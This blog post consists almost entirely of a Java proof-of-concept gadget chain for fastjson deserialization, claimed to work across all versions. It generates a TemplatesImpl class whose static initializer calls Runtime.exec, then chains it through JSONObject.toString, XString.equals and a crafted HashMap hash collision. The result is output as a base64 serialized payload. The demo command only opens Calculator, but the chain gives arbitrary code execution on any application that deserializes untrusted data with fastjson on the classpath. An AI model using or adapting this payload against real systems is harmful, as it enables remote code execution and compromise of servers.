Fastjson native deserialization gadget that works across all versions

Wednesday, 26 April 2023
146 words
1 minute
```java
import com.alibaba.fastjson.JSONObject;   // fastjson 1.x; fastjson 2 uses com.alibaba.fastjson2.JSONObject
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.ClassPool;
import javassist.CtClass;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;

// The statements below run inside a method declared `throws Exception`.

// Build the TemplatesImpl payload class: a subclass of AbstractTranslet whose
// static initializer runs when TemplatesImpl defines and loads the class.
ClassPool pool = ClassPool.getDefault();
CtClass evil = pool.makeClass("evil");
evil.setSuperclass(pool.get(AbstractTranslet.class.getName()));
evil.makeClassInitializer().insertBefore("Runtime.getRuntime().exec(\"open /System/Applications/Calculator.app\");");
byte[] bytes = evil.toBytecode();

// Populate the private TemplatesImpl fields reflectively so that
// getOutputProperties() -> newTransformer() loads the bytecode above.
TemplatesImpl templates = new TemplatesImpl();
Field name = templates.getClass().getDeclaredField("_name");
name.setAccessible(true);
name.set(templates, "t");
Field bytecodes = templates.getClass().getDeclaredField("_bytecodes");
bytecodes.setAccessible(true);
bytecodes.set(templates, new byte[][]{ bytes });
Field tfactory = templates.getClass().getDeclaredField("_tfactory");
tfactory.setAccessible(true);
tfactory.set(templates, new TransformerFactoryImpl());

// Wrapping TemplatesImpl in a JSONObject means JSONObject.toString() serializes
// it with fastjson, which calls its getters, including getOutputProperties().
JSONObject jsonObject = new JSONObject();
jsonObject.put("t", templates);

// XString.equals(Object) calls toString() on its argument, which is the bridge
// from HashMap key comparison to the JSONObject above.
XString t = new XString("t");

// Two maps with the same keys but swapped values: "Ma" and "NB" have the same
// String.hashCode(), so during HashMap.readObject the colliding entries are
// compared with equals(), reaching XString.equals(jsonObject).
HashMap<Object, Object> hashMap = new HashMap<>();
HashMap<Object, Object> hashMap1 = new HashMap<>();
hashMap.put("Ma", t);
hashMap.put("NB", jsonObject);
hashMap1.put("NB", t);
hashMap1.put("Ma", jsonObject);

// Hand-build a HashMap whose table holds both maps as keys in the same bucket,
// so deserialization compares them (and therefore their entries) with equals().
HashMap<Object, Object> hashMap2 = new HashMap<>();
Field size = hashMap2.getClass().getDeclaredField("size");
size.setAccessible(true);
size.set(hashMap2, 2);
Class<?> aClass = Class.forName("java.util.HashMap$Node");
Constructor<?> constructor = aClass.getDeclaredConstructor(int.class, Object.class, Object.class, aClass);
constructor.setAccessible(true);
Object o = Array.newInstance(aClass, 2);
Array.set(o, 0, constructor.newInstance(0, hashMap, "t", null));
Array.set(o, 1, constructor.newInstance(0, hashMap1, "t", null));
Field table = hashMap2.getClass().getDeclaredField("table");
table.setAccessible(true);
table.set(hashMap2, o);

// Outer map so that the TemplatesImpl instance is written into the stream as a key.
HashMap<Object, Object> hashMap3 = new HashMap<>();
hashMap3.put(templates, hashMap2);

// Serialize with plain Java serialization; Tools.base64Encode is the author's own helper.
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
objectOutputStream.writeObject(hashMap3);
System.out.println(Tools.base64Encode(byteArrayOutputStream.toByteArray()));
```

Title: Fastjson native deserialization gadget that works across all versions

Author: Crazy0x70

Link: https://www.crazy0x70.com/posts/11

Last modified:

For commercial reproduction, contact the site owner for permission; for non-commercial reproduction, credit this article and link to it. You may freely copy and redistribute the work in any medium or format, and adapt and build upon it, but derivative works must be distributed under the same license.
This article is licensed under CC BY-NC-SA 4.0.